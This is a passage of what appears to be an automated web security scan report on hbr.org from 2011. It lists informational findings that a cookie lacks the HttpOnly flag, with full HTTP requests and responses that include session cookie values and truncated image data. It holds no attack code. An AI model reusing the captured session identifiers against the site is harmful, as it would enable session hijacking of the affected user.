__utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:20 GMT ETag: "81701-28ac-4a88879d71500" Accept-Ranges: bytes Content-Length: 10412 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:39 GMT LEG: 5 Content-Type: image/gif GIF89a,.d.......oqN..MLQ,....rM...60....}....x........l......[...........Tx.........u.....e.....TAB.[lM..v..c...TU.^U-:G+y.chf<Fc}:Rh...Ji.|z@.....X...fc*h..A8............e...WW..............._..........[SNIP]...
4.16. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/ad_hbr_feedback_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:40 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:19 GMT ETag: "81694-1aa6-4a88879c7d2c0" Accept-Ranges: bytes Content-Length: 6822 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:40 GMT LEG: 5 Content-Type: image/gif GIF89a,.d.............SSS.........@=>^[[......OLM2./.........ljj\'3{yy.<Q.........x+<............ppp.}..VhbbbEEE...................I].ct......?#)....p.....N0--* "..!.-Aj)7..C...777...1!$uss...LII....[SNIP]...
4.17. http://hbr.org/hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/houseads/ad_web_Stress_v1_300x100.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/html/marketing/partner_center.html Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions; IPERCEPTIONS_555=IPERCEPTIONS_555_COOKIE; IPE_S_555=IPE_555_Session; __qca=P0-1531370892-1320847772355; __utma=163134883.1936267531.1320847772.1320847772.1320847772.1; __utmb=163134883.1.10.1320847772; __utmc=163134883; __utmz=163134883.1320847772.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; wooTracker=G5RMAE2ZVH7UCIFHHSZJU2OLNM5HSHKA; wooMeta=MjMyNTE4MTkmMSYxJjAmMTMyMDg0Nzc3NjUzOCYxMzIwODQ3Nzc2NTM5Jmh0dHAlM0ElMkYlMkZ3d3cuZmFrZXJlZmVycmVyZG9taW5hdG9yLmNvbSUyRnJlZmVycmVyUGF0aE5hbWUlM0ZSZWZQYXJOYW1lJTNEUmVmVmFsdWUmMTAyJiYyJiYmJg==; HWF_HISTORY=11|landing:1|
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:39 GMT Server: Apache Last-Modified: Tue, 27 Sep 2011 19:26:22 GMT ETag: "f0752-1a4d-4adf140291380" Accept-Ranges: bytes Content-Length: 6733 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:39 GMT LEG: 5 Content-Type: image/gif GIF89a,.d.....].......ppq......ZWX......|||1-..........LIJ..........HG............?;<.yv.......\Z...vsthef................................W33......dde...XXY0$%.a_.kh@.....q==...=)*.WU....RP q.0{.J......[SNIP]...
4.18. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_buzz.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_buzz.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_buzz.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d7e-f59-4a88879e65740" Accept-Ranges: bytes Content-Length: 3929 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yy.\.y..w..cwfg....@+..$$\..B..U...9.*.B.S...vl....`b...!c |a.`S.(\%.v.A.R.......t`....vwv..9.....{f.h) p\.?.....{o......[SNIP]...
4.19. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_facebook.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_facebook.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_facebook.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:26 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d81-a28-4a88879e65740" Accept-Ranges: bytes Content-Length: 2600 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:26 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Y[o\...k.../......P I ..J*DU. o/..#.U.../..T.S...U....RA.H+..R. .B...\.b;6....g....}.c.u..3.........:...00...!....tI:....[SNIP]...
4.20. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_iphone.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_iphone.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_iphone.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d82-b54-4a88879e65740" Accept-Ranges: bytes Content-Length: 2900 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Y[oT..>...........v......< .".N..H<,...e.....).....E6H......a...`yl...=..~.u..v.1J...t.........7.C.pi4.x.=.......u.].e...[SNIP]...
4.21. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_linkedin.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_linkedin.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_linkedin.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d83-c90-4a88879e65740" Accept-Ranges: bytes Content-Length: 3216 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<...2IDATx..YI.$G.......i3...c..A`3..@BX\.....p......8s. ......YN....#.1.c......*.x........[dWgeeFf|...-iSJ.....I6Smz..zL.............[SNIP]...
4.22. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_newsletters.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_newsletters.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_newsletters.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d84-c00-4a88879e65740" Accept-Ranges: bytes Content-Length: 3072 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yyl....Y?_.@.&...`..\6...8.FB.."... .B......M.&.QS.B.P..BKU... (44... .....M...U..]{L..ovvv.."u..o.......3..j.Fy#......[SNIP]...
4.23. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_rss.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_rss.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_rss.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d85-bfe-4a88879e65740" Accept-Ranges: bytes Content-Length: 3070 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Yk.]U.^k.{....S.....@Z:.* `...<.#Fb..b0"j....!Q....1... ...!...55.D1.%4.wCh+....s:3.1...\{...y.).'w..{.>g.[k}k.}..`......[SNIP]...
4.24. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_twitter.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_twitter.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_twitter.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d86-af8-4a88879e65740" Accept-Ranges: bytes Content-Length: 2808 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<.. .IDATx..Yo.]G.?3..{o..e.n.m..6Z.)1mh1.B.Uh..~... E...U..Z,._.....")(HQ.......A!.V....&Y.....{....g..9w.}o....w..{f.w...;...Zk...[SNIP]...
4.25. http://hbr.org/hbrg-main/resources/images/marketing/sc/sc_youtube.png
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sc/sc_youtube.png
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sc/sc_youtube.png HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:27 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:21 GMT ETag: "5b8d87-d07-4a88879e65740" Accept-Ranges: bytes Content-Length: 3335 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:27 GMT LEG: 5 Content-Type: image/png .PNG . ...IHDR...3...2.....~.t.....tEXtSoftware.Adobe ImageReadyq.e<....IDATx..Y{.U.......}..ED..Vk.\...j[h).i..MS....h..b...cy..!.[.....M ....0Zl....J......u.{.>.........;{....@..9g..o..o...<.C......[SNIP]...
4.26. http://hbr.org/hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/marketing/sub-touts/sub_tout_10062011.jpg HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://web.hbr.org/iframe/hbr_topright.php Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="; marketing_interruption=iperceptions
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:34 GMT Server: Apache Last-Modified: Thu, 06 Oct 2011 22:30:31 GMT ETag: "1bdd9c-cbe4-4aea8df4dcfc0" Accept-Ranges: bytes Content-Length: 52196 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:34 GMT LEG: 5 Content-Type: image/jpeg ......Exif..MM.*.............................b...........j.(...........1..... ...r.2...........i............... ....'.. ....'.Adobe Photoshop CS5.1 Macintosh.2011:09:21 21:26:08..........................[SNIP]...
4.27. http://hbr.org/hbrg-main/resources/images/mastheadNavBg_w11.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/mastheadNavBg_w11.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/mastheadNavBg_w11.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/hbrg-main/resources/css/style.css Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
HTTP/1.1 200 OKSet-Cookie: HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT Date: Wed, 09 Nov 2011 14:09:31 GMT Server: Apache Last-Modified: Wed, 20 Jul 2011 23:20:23 GMT ETag: "68233-13b2-4a8887a04dbc0" Accept-Ranges: bytes Content-Length: 5042 Cache-Control: max-age=259200, public Expires: Sat, 12 Nov 2011 14:09:31 GMT LEG: 5 Content-Type: image/gif GIF89a..i....xvv........................nmm........................?==BAAecc....PNNHFFRPP]\\kii[YY......533!.......,......i.....'.di.h..l..p,.tm.x..|....pH,....r.l:...tJ.Z...v..z...xL.....z.n....|N....[SNIP]...
4.28. http://hbr.org/hbrg-main/resources/images/mastheadSearchForm_submit.gif
previous
next
Summary
Severity:
Information
Confidence:
Certain
Host:
http://hbr.org
Path:
/hbrg-main/resources/images/mastheadSearchForm_submit.gif
Issue detail
The following cookie was issued by the application and does not have the HttpOnly flag set:HBRGSTICKY=R3323092753; path=/; expires=Thu, 10-Nov-2011 02:16:06 GMT The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /hbrg-main/resources/images/mastheadSearchForm_submit.gif HTTP/1.1 Host: hbr.org User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: image/png,image/*;q=0.8,*/*;q=0.5 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7 Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://hbr.org/product/how-venture-capitalists-evaluate-potential-venture/an/805019-PDF-ENG?Ntt=Venture+Capital+process&Nao=10 Cookie: HBRGSTICKY=R3323092753; JSESSIONID=A837554C12128295199779BB9AA818B8; HWF_CART="f6OKrnjCoE0aRqdp3mRZDtmX9qLlf42gLPEEZJqIzkl14OA/amNEptq3wTjMux0a1J/xSQ9TvTp3 796mC/LRRA=="
Response
